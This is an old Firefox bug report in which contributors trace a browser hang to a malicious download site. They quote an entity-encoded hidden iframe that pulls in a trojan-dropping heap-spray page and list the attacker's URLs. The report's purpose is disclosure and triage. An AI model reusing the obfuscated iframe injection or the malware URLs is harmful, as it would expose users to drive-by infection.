Closed Bug 320348 Opened 19 years ago Closed 19 years ago

browser freezes because of an illegal script

Categories

(Core :: Security, defect)

Product:
Core
Component:
Security
Version:
1.8 Branch
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
RESOLVED DUPLICATE of bug 317334

People

(Reporter: fignamoya, Assigned: dveditz)

References

(
URL
)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5

Browser freezes due to an illegal script on a page. This, in turn causes all firefox windows to close.

Reproducible: Always

Steps to Reproduce:
1. go to http://www.serials.ws/all/?l=v&pn=3
2. ctrl+f and search 1301 on the page (javascript link to visual assist x... 1301)
3. click on the link and observe how the browser runs cpu usage to 100%
Version: unspecified → 1.5 Branch
Component: General → Layout
Product: Firefox → Core
QA Contact: general → layout
Version: 1.5 Branch → 1.8 Branch
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9a1) Gecko/20051215 Firefox/1.6a1 ID:2005121500
I see this too.
in addition this appears to disable block popups option in the browser
Component: Layout → JavaScript Engine
view-source:http://www.serials.ws/all/?l=v&pn=3

<a href=javascript:d(170307)>Visual Assist X 10.1.1301</a> :: 2005-04-30 

http://www.serials.ws/serws.js

function d(id){ 
window.open('/d.php?n='+id,'Operate','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,width=650,height=550');
}

view-source:http://www.serials.ws/d.php?170307

this page contains an iframe:
<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#116;&#111;&#111;&#108;&#98;&#97;&#114;&#117;&#114;&#108;&#46;&#98;&#105;&#122;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#54;&#54;&#49;&#46;&#112;&#104;&#112;" width=1 height=1></iframe> 

the iframe loads:
view-source:http://toolbarurl.biz/dl/adv661.php

this in turn loads 8 iframes:
view-source:http://toolbarurl.biz/dl/fillmemadv661.htm

and 1 iframe:
view-source:http://toolbarurl.biz/dl/bag.htm

seen with the view-source: prefixed, the URLs in comment 3 are harmless.

view-source:http://toolbarurl.biz/dl/fillmemadv661.htm
fills the memory with with 100000 times an returnadress, and then a short piece of code, 586 words.

memory is filled by 8 iframes of this type, and the bag.html seems to be used to produce a crash, hopefully landing in one of those long regions leading to the exploit code.

google search for ADV661 shows it is a trojan:

http://sandbox.norman.no/live_2.html?logfile=437547
http://www.sophos.com/virusinfo/analyses/trojdownldrdl.html

If you've been on the site, read the reports to check if you are infected.
I don't want to try going to this site with js enabled.

I'm setting component to Security, so dveditz@cruzio.com can look if we are in danger, or if it's just a hang.
Assignee: nobody → dveditz
Status: UNCONFIRMED → NEW
Component: JavaScript Engine → Security
Ever confirmed: true
QA Contact: layout → toolkit
Similar scripts used in
Bug 320760 Browser hangs at 100% CPU following document.write by malicious javascript
Bug 317334 hang when long wrappable string is passed to prompt() [e.g. as used in the exploit for IE's <body onload=window()> bug]

*** This bug has been marked as a duplicate of 317334 ***
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.